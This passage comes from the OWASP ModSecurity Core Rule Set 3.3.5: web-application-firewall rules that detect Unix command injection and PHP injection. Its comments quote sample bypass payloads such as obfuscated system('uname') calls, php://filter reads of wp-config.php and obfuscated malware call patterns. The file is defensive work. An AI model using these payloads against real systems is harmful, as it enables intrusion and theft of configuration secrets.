REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:(?:(?:a[\\\\'\"]*p[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*u[\\\\'\"]*d|u[\\\\'\"]*p[\\\\'\"]*2[\\\\'\"]*d[\\\\'\"]*a[\\\\'\"]*t)[\\\\'\"]*e|d[\\\\'\"]*n[\\\\'\"]*f|v[\\\\'\"]*i)[\\\\'\"]*(?:\s|<|>).*|p[\\\\'\"]*(?:a[\\\\'\"]*c[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*(?:\s|<|>).*|w[\\\\'\"]*d|s)|w[\\\\'\"]*(?:(?:\s|<|>).*|h[\\\\'\"]*o))\b" \ "id:932106,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Remote Command Execution: Unix Command Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-unix',\ tag:'attack-rce',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # # -=[ Bypass Rule 930120 (wildcard) ]=- # # When Paranoia Level is set to 1 and 2, a Remote Command Execution # could be exploited bypassing rule 930120 (OS File Access Attempt) # by using wildcard characters. # # In some other cases, it could be bypassed even if the Paranoia Level is set to 3. # Please, keep in mind that this rule could lead to many false positives. # SecRule ARGS "@rx (?:/|\\\\)(?:[\?\*]+[a-z/\\\\]+|[a-z/\\\\]+[\?\*]+)" \ "id:932190,\ phase:2,\ block,\ capture,\ t:none,t:urlDecode,t:urlDecodeUni,t:normalizePath,t:cmdLine,\ msg:'Remote Command Execution: Wildcard bypass technique attempt',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-unix',\ tag:'attack-rce',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-932-APPLICATION-ATTACK-RCE" modsecurity-crs-3.3.5/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf000066400000000000000000000776671446122515100235060ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # # -=[ PHP Injection Attacks ]=- # # [ References ] # http://rips-scanner.sourceforge.net/ # https://www.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Executionh # # # [ PHP Open Tag Found ] # # Detects PHP open tags "', but # this resulted in false positives which were difficult to prevent. # Therefore, that pattern is now checked by rule 933190 in paranoia levels # 3 or higher. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:<\?(?:[^x]|x[^m]|xm[^l]|xml[^\s]|xml$|$)|<\?php|\[(?:\/|\\\\)?php\])" \ "id:933100,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:lowercase,\ msg:'PHP Injection Attack: PHP Open Tag Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [ PHP Script Uploads ] # # Block file uploads with filenames ending in PHP related extensions # (.php, .phps, .phtml, .php5 etc). # # Many application contain Unrestricted File Upload vulnerabilities. # https://www.owasp.org/index.php/Unrestricted_File_Upload # # Attackers may use such a vulnerability to achieve remote code execution # by uploading a .php file. If the upload storage location is predictable # and not adequately protected, the attacker may then request the uploaded # .php file and have the code within it executed on the server. # # Also block files with just dot (.) characters after the extension: # https://community.rapid7.com/community/metasploit/blog/2013/08/15/time-to-patch-joomla # # Some AJAX uploaders use the nonstandard request headers X-Filename, # X_Filename, or X-File-Name to transmit the file name to the server; # scan these request headers as well as multipart/form-data file names. # SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\.*$" \ "id:933110,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'PHP Injection Attack: PHP Script File Upload Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [ PHP Configuration Directives ] # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-config-directives.data" \ "id:933120,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:normalisePath,t:lowercase,\ msg:'PHP Injection Attack: Configuration Directive Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "@pm =" \ "capture,\ ctl:auditLogParts=+E,\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [ PHP Variables ] # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-variables.data" \ "id:933130,\ phase:2,\ block,\ capture,\ t:none,t:normalisePath,t:urlDecodeUni,t:lowercase,\ msg:'PHP Injection Attack: Variables Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [ PHP I/O Streams ] # # The "php://" syntax can be used to refer to various objects, such as local files (for LFI), # remote urls (for RFI), or standard input/request body. Its occurrence indicates a possible attempt # to either inject PHP code or exploit a file inclusion vulnerability in a PHP web app. # # Examples: # php://filter/resource=./../../../wp-config.php # php://filter/resource=http://www.example.com # php://stdin # php://input # # http://php.net/manual/en/wrappers.php.php # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)php://(?:std(?:in|out|err)|(?:in|out)put|fd|memory|temp|filter)" \ "id:933140,\ phase:2,\ block,\ capture,\ t:none,\ msg:'PHP Injection Attack: I/O Stream Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [ PHP Wrappers ] # # PHP comes with many built-in wrappers for various URL-style protocols for use with the filesystem # functions such as fopen(), copy(), file_exists() and filesize(). Abusing of PHP wrappers like phar:// # could lead to RCE as describled by Sam Thomas at BlackHat USA 2018 (https://bit.ly/2yaKV5X), even # wrappers like zlib://, glob://, rar://, zip://, etc... could lead to LFI and expect:// to RCE. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:zlib|glob|phar|ssh2|rar|ogg|expect|zip)://" \ "id:933200,\ phase:2,\ block,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\ msg:'PHP Injection Attack: Wrapper scheme detected',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [ PHP Functions ] # # Detecting PHP function names is useful to block PHP code injection attacks. # There are many PHP functions. We have to strike a balance between robust detection # of PHP code in content, and the risk of false positives. # # The list of PHP functions is divided into four groups of varying attack/false positive risk. # Four separate rules are used to detect these groups of functions: # # - Rule 933150: ~40 words highly common to PHP injection payloads and extremely rare in # natural language or other contexts. # Examples: 'base64_decode', 'file_get_contents'. # These words are detected as a match directly using @pmFromFile. # Function names are defined in php-function-names-933150.data # # - Rule 933160: ~220 words which are common in PHP code, but have a higher chance to cause # false positives in natural language or other contexts. # Examples: 'chr', 'eval'. # To mitigate false positives, a regexp looks for PHP function syntax, e.g. 'eval()'. # Regexp is generated from function names in util/regexp-assemble/regexp-933160.data # # - Rule 933151: ~1300 words of lesser importance. This includes most PHP functions and keywords. # Examples: 'addslashes', 'array_diff'. # For performance reasons, the @pmFromFile operator is used, and many functions from lesser # used PHP extensions are removed. # To mitigate false positives, we only match when the '(' character is also found. # This rule only runs in paranoia level 2 or higher. # Function names are defined in php-function-names-933151.data # # - Rule 933161: ~200 words with short or trivial names, possibly leading to false positives. # Examples: 'abs', 'cos'. # To mitigate false positives, a regexp matches on function syntax, e.g. 'abs()'. # This rule only runs in paranoia level 3 or higher. # Regexp is generated from function names in util/regexp-assemble/regexp-933161.data # # # [ PHP Functions: High-Risk PHP Function Names ] # # Rule 933150 contains a small list of function names which are highly indicative of a PHP # injection attack, for example 'base64_decode'. # We block these function names outright, without using a complex regexp or chain. # This could make the detection a bit more robust against possible bypasses. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933150.data" \ "id:933150,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'PHP Injection Attack: High-Risk PHP Function Name Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [ PHP Functions: High-Risk PHP Function Calls ] # # Some PHP function names have a certain risk of false positives, due to short # names, full or partial overlap with common natural language terms, uses in # other contexts, et cetera. Some examples are 'eval', 'exec', 'system'. # # For these function names, we apply a regexp to look for PHP function syntax. # The regexp looks for a word boundary and adjoining parentheses. # For instance, we want to block 'eval()', but we want to allow 'medieval()'. # # We have to be careful of possible bypasses using comment syntax. Examples: # # system(...) # system (...) # system\t(...) # system /*comment*/ (...) # system /*multiline \n comment*/ (...) # system //comment \n (...) # system #comment \n (...) # # This rule is also triggered by the following exploit(s): # [ Apache Struts vulnerability CVE-2017-9791 - Exploit tested: https://www.exploit-db.com/exploits/42324 ] # [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45260 ] # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # # Regexp generated from util/regexp-assemble/regexp-933160.data using Regexp::Assemble. # See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. # # Note that after assemble, PHP function syntax pre/postfix is added to the Regexp::Assemble # output. Example: "@rx (?i)\bASSEMBLE_OUTPUT_HERE(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create|socket_client)|ipc?slashes|rev)|implexml_load_(?:string|file)|ocket_c(?:onnect|reate)|h(?:ow_sourc|a1_fil)e|pl_autoload_register|ystem)|p(?:r(?:eg_(?:replace(?:_callback(?:_array)?)?|match(?:_all)?|split)|oc_(?:(?:terminat|clos|nic)e|get_status|open)|int_r)|o(?:six_(?:get(?:(?:e[gu]|g)id|login|pwnam)|mk(?:fifo|nod)|ttyname|kill)|pen)|hp(?:_(?:strip_whitespac|unam)e|version|info)|g_(?:(?:execut|prepar)e|connect|query)|a(?:rse_(?:ini_file|str)|ssthru)|utenv)|r(?:unkit_(?:function_(?:re(?:defin|nam)e|copy|add)|method_(?:re(?:defin|nam)e|copy|add)|constant_(?:redefine|add))|e(?:(?:gister_(?:shutdown|tick)|name)_function|ad(?:(?:gz)?file|_exif_data|dir))|awurl(?:de|en)code)|i(?:mage(?:createfrom(?:(?:jpe|pn)g|x[bp]m|wbmp|gif)|(?:jpe|pn)g|g(?:d2?|if)|2?wbmp|xbm)|s_(?:(?:(?:execut|write?|read)ab|fi)le|dir)|ni_(?:get(?:_all)?|set)|terator_apply|ptcembed)|g(?:et(?:_(?:c(?:urrent_use|fg_va)r|meta_tags)|my(?:[gpu]id|inode)|(?:lastmo|cw)d|imagesize|env)|z(?:(?:(?:defla|wri)t|encod|fil)e|compress|open|read)|lob)|a(?:rray_(?:u(?:intersect(?:_u?assoc)?|diff(?:_u?assoc)?)|intersect_u(?:assoc|key)|diff_u(?:assoc|key)|filter|reduce|map)|ssert(?:_options)?)|h(?:tml(?:specialchars(?:_decode)?|_entity_decode|entities)|(?:ash(?:_(?:update|hmac))?|ighlight)_file|e(?:ader_register_callback|x2bin))|f(?:i(?:le(?:(?:[acm]tim|inod)e|(?:_exist|perm)s|group)?|nfo_open)|tp_(?:nb_(?:ge|pu)|connec|ge|pu)t|(?:unction_exis|pu)ts|write|open)|o(?:b_(?:get_(?:c(?:ontents|lean)|flush)|end_(?:clean|flush)|clean|flush|start)|dbc_(?:result(?:_all)?|exec(?:ute)?|connect)|pendir)|m(?:b_(?:ereg(?:_(?:replace(?:_callback)?|match)|i(?:_replace)?)?|parse_str)|(?:ove_uploaded|d5)_file|ethod_exists|ysql_query|kdir)|e(?:x(?:if_(?:t(?:humbnail|agname)|imagetype|read_data)|ec)|scapeshell(?:arg|cmd)|rror_reporting|val)|c(?:url_(?:file_create|exec|init)|onvert_uuencode|reate_function|hr)|u(?:n(?:serialize|pack)|rl(?:de|en)code|[ak]?sort)|(?:json_(?:de|en)cod|debug_backtrac|tmpfil)e|b(?:(?:son_(?:de|en)|ase64_en)code|zopen)|var_dump)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" \ "id:933160,\ phase:2,\ block,\ capture,\ t:none,\ msg:'PHP Injection Attack: High-Risk PHP Function Call Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [ PHP Object Injection ] # # PHP Object Injection is an application level vulnerability that could allow # an attacker to perform different kinds of malicious attacks, such as # Code Injection, SQL Injection, Path Traversal and Application Denial of Service, # depending on the context. # # The vulnerability occurs when user-supplied input is not properly sanitized # before being passed to the unserialize() PHP function. Since PHP allows object # serialization, attackers could pass ad-hoc serialized strings to a vulnerable # unserialize() call, resulting in an arbitrary PHP object(s) injection into the # application scope. # # https://www.owasp.org/index.php/PHP_Object_Injection # # In serialized form, PHP objects have the following format: # # O:8:"stdClass":1:{s:1:"a";i:2;} # O:3:"Foo":0:{} # # Also detected are PHP objects with a custom unserializer: # http://www.phpinternalsbook.com/classes_objects/serialization.html # These have the following format: # # C:11:"ArrayObject":37:{x:i:0;a:1:{s:1:"a";s:1:"b";};m:a:0:{}} # C:3:"Foo":23:{s:15:"My private data";} # # HTTP headers are inspected, since PHP object injection vulnerabilities have been # found in applications parsing them: # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562 (User-Agent header) # https://www.exploit-db.com/exploits/39033/ (X-Forwarded-For header) # http://karmainsecurity.com/KIS-2015-10 (Host header) # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|ARGS_NAMES|ARGS|XML:/* "@rx [oOcC]:\d+:\".+?\":\d+:{.*}" \ "id:933170,\ phase:2,\ block,\ capture,\ t:none,\ msg:'PHP Injection Attack: Serialized Object Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [ PHP Functions: Variable Function Calls ] # # PHP 'variable functions' provide an alternate syntax for calling PHP functions. # http://php.net/manual/en/functions.variable-functions.php # # An attacker may use variable function syntax to evade detection of function # names during exploitation of a remote code execution vulnerability. # An example to use the 'file_get_contents' function while evading rule 933150: # # $fn = 'file_' . 'get_' . 'contents'; # echo $fn('wp-co' . 'nfig.php'); # # Some examples from obfuscated malware: # # $OOO0000O0(...) # @$b374k(...) # $_[@-_]($_[@!+_] ) # # A breakdown of the regular expression: # # \$+ # The variable's '$' char, or multiple '$' for 'variable variables': # http://php.net/manual/en/language.variables.variable.php # (?:[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*|\s*{.+}) # One of the following: # - A variable name; regexp from http://php.net/language.variables.basics # - A nonempty expression for variable variables: ${'fn'} or $ {'fn'} # (?:\s|\[.+\]|{.+}|/\*.*\*/|//.*|#.*)* # Optional whitespace, array access, or comments # \(.*\) # Parentheses optionally containing function parameters # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx \$+(?:[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*|\s*{.+})(?:\s|\[.+\]|{.+}|/\*.*\*/|//.*|#.*)*\(.*\)" \ "id:933180,\ phase:2,\ block,\ capture,\ t:none,\ msg:'PHP Injection Attack: Variable Function Call Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ PHP Functions: Variable Function Prevent Bypass ] # # Referring to https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/ # the rule 933180 could be bypassed by using the following payloads: # # - (system)('uname') # - (sy.(st).em)('uname') # - (string)"system"('uname') # - define('x', 'sys' . 'tem');(x)/* comment */('uname') # - $y = 'sys'.'tem';($y)('uname') # - define('z', [['sys' .'tem']]);(z)[0][0]('uname'); # - (system)(ls) # - (/**/system)(ls/**/); # - (['system'])[0]('uname'); # - (++[++system++][++0++])++{/*dsasd*/0}++(++ls++); # # This rule blocks all payloads above and avoids to block values like: # # - [ACME] this is a test (just a test) # - Test (with two) rounded (brackets) # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:(?:\(|\[)[a-zA-Z0-9_.$\"'\[\](){}/*\s]+(?:\)|\])[0-9_.$\"'\[\](){}/*\s]*\([a-zA-Z0-9_.$\"'\[\](){}/*\s].*\)|\([\s]*string[\s]*\)[\s]*(?:\"|'))" \ "id:933210,\ phase:2,\ block,\ capture,\ t:none,t:urlDecode,t:replaceComments,t:compressWhitespace,\ msg:'PHP Injection Attack: Variable Function Call Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # # # [ PHP Functions: Medium-Risk PHP Function Names ] # # In paranoia level 2, we add additional checks for most PHP functions. # # The size of the PHP function list is considerable. # Even after excluding the more obscure PHP extensions, 1300+ functions remain. # For performance and maintenance reasons, this rule does not use a regexp, # but uses a phrase file (@pmFromFile), and additionally looks for an '(' character # in the matched variable. # # This approach carries some risk for false positives. Therefore, the function list # has been curated to remove words closely matching natural language and terms often # used in other contexts. # # This rule is a stricter sibling of rule 933150. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933151.data" \ "id:933151,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'PHP Injection Attack: Medium-Risk PHP Function Name Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/2',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "@pm (" \ "capture,\ ctl:auditLogParts=+E,\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # # # [ PHP Variables: Common Variable Indexes ] # # In paranoia level 3, we add additional checks for parameters to many PHP variables. # # # One of the more common variables used within attacks on PHP is $_SERVER. Because # of how many different ways PHP has for executing variables (variable variables, # etc) often just looking for $_SERVER will be less effective than looking for the # various indexes within $_SERVER. This rule checks for these indexes. # This rule is located in PL 3 because often developers will use these names as # parameter names or values and this will lead to false positives. # Because this list is not expected to change and it is limited in size we use a # regex in this case to look for these values whereas in its sibling rule we use # @pmFromFile for flexibility and performance. # # To rebuild the regexp: # cd util/regexp-assemble # ./regexp-assemble.pl < regexp-933131.data # # This rule is a stricter sibling of rule 933130. SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:HTTP_(?:ACCEPT(?:_(?:ENCODING|LANGUAGE|CHARSET))?|(?:X_FORWARDED_FO|REFERE)R|(?:USER_AGEN|HOS)T|CONNECTION|KEEP_ALIVE)|PATH_(?:TRANSLATED|INFO)|ORIG_PATH_INFO|QUERY_STRING|REQUEST_URI|AUTH_TYPE)" \ "id:933131,\ phase:2,\ block,\ capture,\ t:none,t:normalisePath,t:urlDecodeUni,\ msg:'PHP Injection Attack: Variables Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/3',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # # [ PHP Functions: Low-Value PHP Function Calls ] # # In paranoia level 3, we add additional checks for the remaining PHP functions. # # Most of these function names are likely to cause false positives in natural text # or common parameter values, such as 'abs', 'copy', 'date', 'key', 'max', 'min'. # Therefore, these function names are not scanned in lower paranoia levels. # # To mitigate the risk of false positives somewhat, a regexp is used to look for # PHP function syntax. (See rule 933160 for a description.) # # This rule is a stricter sibling of rule 933160. # # This rule is also triggered by the following exploit(s): # [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45262 ] # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # # Regexp generated from util/regexp-assemble/regexp-933161.data using Regexp::Assemble. # See 